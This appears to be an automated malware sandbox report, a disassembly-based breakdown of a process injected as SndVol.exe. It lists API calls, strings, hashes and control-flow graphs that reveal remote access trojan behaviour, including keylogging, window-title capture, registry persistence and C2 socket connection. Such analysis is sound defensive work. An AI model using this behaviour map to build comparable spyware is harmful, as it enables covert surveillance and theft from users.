                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep$ErrorLastLocalTime
                                                                  • String ID: | $%I64u$3.8.0 Pro$C:\Windows\SysWOW64\SndVol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$H"G$TLS Off$TLS On $`"G$hlight$name$!G
                                                                  • API String ID: 524882891-3617896314
                                                                  • Opcode ID: 04458a4c39c0faa6fda59e91e24422400087db4d2b388f268530565d1c5e53b9
                                                                  • Instruction ID: 5f58eceae2704c6c0e376aa481a0c6a7ef3cc820e2c63ea8d389b44db61c6c97
                                                                  • Opcode Fuzzy Hash: 04458a4c39c0faa6fda59e91e24422400087db4d2b388f268530565d1c5e53b9
                                                                  • Instruction Fuzzy Hash: 9F42AE31A001055BCB18F765DDA6AEEB3699F90308F1041BFF40A721E2EF785F868A5D

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • connect.WS2_32(?,?,?), ref: 004048C0
                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                                                                  • WSAGetLastError.WS2_32 ref: 00404A01
                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                  • API String ID: 994465650-2151626615
                                                                  • Opcode ID: c47823f5d81b8fcd8c44ffe76240809f8c8049aa42c9dfd8a5859606e97f7b5b
                                                                  • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                                                                  • Opcode Fuzzy Hash: c47823f5d81b8fcd8c44ffe76240809f8c8049aa42c9dfd8a5859606e97f7b5b
                                                                  • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                                                                  • closesocket.WS2_32(000000FF), ref: 00404E3A
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E71
                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404E82
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E89
                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9A
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9F
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EA4
                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB1
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                  • String ID:
                                                                  • API String ID: 3658366068-0
                                                                  • Opcode ID: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
                                                                  • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                                                                  • Opcode Fuzzy Hash: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
                                                                  • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 00409C81
                                                                  • Sleep.KERNEL32(000001F4), ref: 00409C8C
                                                                  • GetForegroundWindow.USER32 ref: 00409C92
                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                                                                  • Sleep.KERNEL32(000003E8), ref: 00409D9D
                                                                    • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                                  • API String ID: 911427763-3954389425
                                                                  • Opcode ID: ee9b949ba4685117d773663a634f46785a27bf3fcb47f19481d588488b50e058
                                                                  • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                                                                  • Opcode Fuzzy Hash: ee9b949ba4685117d773663a634f46785a27bf3fcb47f19481d588488b50e058
                                                                  • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1051 40c5ed-40c612 call 401f66 1054 40c618 1051->1054 1055 40c73c-40c762 call 401ee4 GetLongPathNameW call 40415e 1051->1055 1056 40c711-40c716 1054->1056 1057 40c654-40c659 1054->1057 1058 40c727 1054->1058 1059 40c718-40c725 call 439e5f 1054->1059 1060 40c629-40c637 call 41959f call 401ef3 1054->1060 1061 40c64a-40c64f 1054->1061 1062 40c70a-40c70f 1054->1062 1063 40c65e-40c665 call 419f23 1054->1063 1064 40c61f-40c624 1054->1064 1081 40c767-40c7d4 call 40415e call 40c7f9 call 402f85 * 2 call 401ee9 * 5 1055->1081 1067 40c72c-40c731 call 439e5f 1056->1067 1057->1067 1058->1067 1059->1058 1078 40c732-40c737 call 408093 1059->1078 1085 40c63c 1060->1085 1061->1067 1062->1067 1076 40c667-40c6b7 call 40415e call 439e5f call 40415e call 402f85 call 401ef3 call 401ee9 * 2 1063->1076 1077 40c6b9-40c705 call 40415e call 439e5f call 40415e call 402f85 call 401ef3 call 401ee9 * 2 1063->1077 1064->1067 1067->1078 1090 40c640-40c645 call 401ee9 1076->1090 1077->1085 1078->1055 1085->1090 1090->1055
                                                                  APIs
                                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LongNamePath
                                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                  • API String ID: 82841172-425784914
                                                                  • Opcode ID: d3518c8d59edcaf627053583512712ef66c69770ad1c8e6e2541324bc6181318
                                                                  • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                                                                  • Opcode Fuzzy Hash: d3518c8d59edcaf627053583512712ef66c69770ad1c8e6e2541324bc6181318
                                                                  • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • Sleep.KERNEL32(00001388), ref: 00409738
                                                                    • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                                                    • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                                                    • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                                                    • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                                                                    • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,?,00000000,00000000,00000000,00000000,00000000), ref: 0040991F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                  • String ID: 05ou`ou$H"G$H"G
                                                                  • API String ID: 3795512280-2072512923
                                                                  • Opcode ID: b8336bd786565f66fdc5ece92215671476f6ca181f44d705e0a27e626737db20
                                                                  • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                                                                  • Opcode Fuzzy Hash: b8336bd786565f66fdc5ece92215671476f6ca181f44d705e0a27e626737db20
                                                                  • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1278 4192ae-419305 call 419f23 call 411f91 call 401fc2 call 401fb8 call 4060ea 1289 419307-419316 call 411f91 1278->1289 1290 419348-419351 1278->1290 1295 41931b-419332 call 401f8b StrToIntA 1289->1295 1291 419353-419358 1290->1291 1292 41935a 1290->1292 1294 41935f-41936a call 40535d 1291->1294 1292->1294 1300 419340-419343 call 401fb8 1295->1300 1301 419334-41933d call 41accf 1295->1301 1300->1290 1301->1300
                                                                  APIs
                                                                    • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                                                    • Part of subcall function 00411F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                    • Part of subcall function 00411F91: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                    • Part of subcall function 00411F91: RegCloseKey.KERNEL32(?), ref: 00411FDD
                                                                  • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCurrentOpenProcessQueryValue
                                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                  • API String ID: 1866151309-2070987746
                                                                  • Opcode ID: 0802035b950ed000d9a10129efeec30dbf5645d1e0bd6e921da0c017b2021ac7
                                                                  • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                                                                  • Opcode Fuzzy Hash: 0802035b950ed000d9a10129efeec30dbf5645d1e0bd6e921da0c017b2021ac7
                                                                  • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1305 40966d-40967d 1306 409683-409685 1305->1306 1307 40971a-40971d 1305->1307 1308 409688-4096ae call 401ee4 CreateFileW 1306->1308 1311 4096b0-4096be GetFileSize 1308->1311 1312 4096ee 1308->1312 1314 4096c0 1311->1314 1315 4096e5-4096ec CloseHandle 1311->1315 1313 4096f1-4096f5 1312->1313 1313->1308 1318 4096f7-4096fa 1313->1318 1316 4096c2-4096c8 1314->1316 1317 4096ca-4096d1 1314->1317 1315->1313 1316->1315 1316->1317 1319 4096d3-4096d5 call 40a025 1317->1319 1320 4096da-4096df Sleep 1317->1320 1318->1307 1321 4096fc-409703 1318->1321 1319->1320 1320->1315 1321->1307 1323 409705-409715 call 408098 call 409203 1321->1323 1323->1307
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                                                  • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                                  • String ID: h G
                                                                  • API String ID: 1958988193-3300504347
                                                                  • Opcode ID: 13e975a3868741cffac1d73112577800afb55aac81ce9bb8c63aa5aacad1b37c
                                                                  • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                                                                  • Opcode Fuzzy Hash: 13e975a3868741cffac1d73112577800afb55aac81ce9bb8c63aa5aacad1b37c
                                                                  • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1327 41a17b-41a18c 1328 41a1a4-41a1ab 1327->1328 1329 41a18e-41a191 1327->1329 1332 41a1ac-41a1c5 CreateFileW 1328->1332 1330 41a193-41a198 1329->1330 1331 41a19a-41a1a2 1329->1331 1330->1332 1331->1332 1333 41a1c7-41a1c9 1332->1333 1334 41a1cb-41a1d0 1332->1334 1335 41a209-41a20e 1333->1335 1336 41a1d2-41a1e0 SetFilePointer 1334->1336 1337 41a1eb-41a1fc WriteFile 1334->1337 1336->1337 1340 41a1e2-41a1e9 CloseHandle 1336->1340 1338 41a200-41a207 CloseHandle 1337->1338 1339 41a1fe 1337->1339 1338->1335 1339->1338 1340->1333
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,004098DF,?,00000000,00000000), ref: 0041A1D7
                                                                  • CloseHandle.KERNEL32(00000000,?,004098DF,?,00000000,00000000), ref: 0041A1E3
                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004098DF,?,00000000,00000000), ref: 0041A1F4
                                                                  • CloseHandle.KERNEL32(00000000,?,004098DF,?,00000000,00000000), ref: 0041A201
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                                  • String ID:
                                                                  • API String ID: 1852769593-0
                                                                  • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                                                  • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                                                                  • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                                                  • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
                                                                  • CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7
                                                                    • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                    • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread$LocalTimewsprintf
                                                                  • String ID: Offline Keylogger Started
                                                                  • API String ID: 465354869-4114347211
                                                                  • Opcode ID: 4f413bfeddc20b053a911010c7dd0c78c6d83759768fb02ef20824c4023f4b57
                                                                  • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                                                                  • Opcode Fuzzy Hash: 4f413bfeddc20b053a911010c7dd0c78c6d83759768fb02ef20824c4023f4b57
                                                                  • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1363 404f31-404f3f 1364 404f45-404f4c 1363->1364 1365 404fca 1363->1365 1367 404f54-404f5b 1364->1367 1368 404f4e-404f52 1364->1368 1366 404fcc-404fd1 1365->1366 1369 404fa0-404fc8 CreateEventA CreateThread 1367->1369 1370 404f5d-404f9b GetLocalTime call 419b16 call 4052dd call 402073 call 4194da call 401fb8 1367->1370 1368->1369 1369->1366 1370->1369
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?), ref: 00404F61
                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005130,?,00000000,00000000), ref: 00404FC0
                                                                  Strings
                                                                  • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Create$EventLocalThreadTime
                                                                  • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                  • API String ID: 2532271599-507513762
                                                                  • Opcode ID: 5d766c76dcec6d73f72b384432e0c1d874659834d306d7d3d0de572776f31551
                                                                  • Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
                                                                  • Opcode Fuzzy Hash: 5d766c76dcec6d73f72b384432e0c1d874659834d306d7d3d0de572776f31551
                                                                  • Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1380 41215f-412176 RegCreateKeyA 1381 412178-4121ad call 40245c call 401f8b RegSetValueExA RegCloseKey 1380->1381 1382 4121af 1380->1382 1384 4121b1-4121bf call 401fb8 1381->1384 1382->1384
                                                                  APIs
                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041216E
                                                                  • RegSetValueExA.KERNEL32(?,00464150,00000000,?,00000000,00000000,00472200,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 00412196
                                                                  • RegCloseKey.KERNEL32(?,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 004121A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateValue
                                                                  • String ID: pth_unenc
                                                                  • API String ID: 1818849710-4028850238
                                                                  • Opcode ID: bb05d805405002c9ea24476e63677667bc427e1baa708286b474a2e763bb1422
                                                                  • Instruction ID: 4e2890e51e7d784523b6c6e9c9a916a8daaabc2f4381c7e0ff06ecafce147d70
                                                                  • Opcode Fuzzy Hash: bb05d805405002c9ea24476e63677667bc427e1baa708286b474a2e763bb1422
                                                                  • Instruction Fuzzy Hash: 5AF0F632100208BFCB00EFA0DD45DEE373CEF04751F104226BD09A61A2D7359E10DB94
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
                                                                  • RegCloseKey.KERNEL32(?), ref: 00411F7D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: pth_unenc
                                                                  • API String ID: 3677997916-4028850238
                                                                  • Opcode ID: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
                                                                  • Instruction ID: 6ec0a72befc52f1c009cc632a5b728b25634ffaa8485c37bac66e7b8b5c78dc5
                                                                  • Opcode Fuzzy Hash: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
                                                                  • Instruction Fuzzy Hash: 31F01D7694020CBFDF109FA09C45FEE7BBCEB04B11F1041A5BA04E6191D2359A54DB94
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                  • RegCloseKey.KERNEL32(?), ref: 00411FDD
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3677997916-0
                                                                  • Opcode ID: bd819641beb65f800504f4ea07b1b85b9b2ddc2993f1f77fdff934dbeb1127c7
                                                                  • Instruction ID: 7c5a36a74d232ee299d7294234303f181ef10811f7d8c913f13e4634b011a18e
                                                                  • Opcode Fuzzy Hash: bd819641beb65f800504f4ea07b1b85b9b2ddc2993f1f77fdff934dbeb1127c7
                                                                  • Instruction Fuzzy Hash: 2D01D676900218BBCB209B95DD08DEF7F7DDB84751F000166BB05A3150DB748E46D7B8
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID: P@
                                                                  • API String ID: 1279760036-676759640
                                                                  • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                                                  • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                                                                  • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                                                  • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD
                                                                  APIs
                                                                  • socket.WS2_32(?,00000001,00000006), ref: 00404832
                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052EB,?,?,00000000,00000000,?,?,00000000,004051E8,?,00000000), ref: 0040486E
                                                                    • Part of subcall function 0040487E: WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateEventStartupsocket
                                                                  • String ID:
                                                                  • API String ID: 1953588214-0
                                                                  • Opcode ID: d0890d6b9dbf7aa10081a8f0c48d4e4836abc09c18ec6d90db35a2a0ad95277d
                                                                  • Instruction ID: 6a7ca6a32121b389846a28cffc2ecd87dee0ffbb862a0929ff73aad7f5bc5f79
                                                                  • Opcode Fuzzy Hash: d0890d6b9dbf7aa10081a8f0c48d4e4836abc09c18ec6d90db35a2a0ad95277d
                                                                  • Instruction Fuzzy Hash: 3301B1B14087809FD7349F28B8446877FE0AB15300F048D6EF1CA93BA1D3B1A444CB18
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                                                  • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                                                                  • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                                                  • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D
                                                                  APIs
                                                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,0046FACC,00471FFC,00000000,00413BDE,00000000,00000001), ref: 00413961
                                                                  • WSASetLastError.WS2_32(00000000), ref: 00413966
                                                                    • Part of subcall function 004137DC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                                                    • Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 0041386D
                                                                    • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                                                    • Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 00413894
                                                                    • Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 004138CC
                                                                    • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                                                    • Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                                                    • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                  • String ID:
                                                                  • API String ID: 1170566393-0
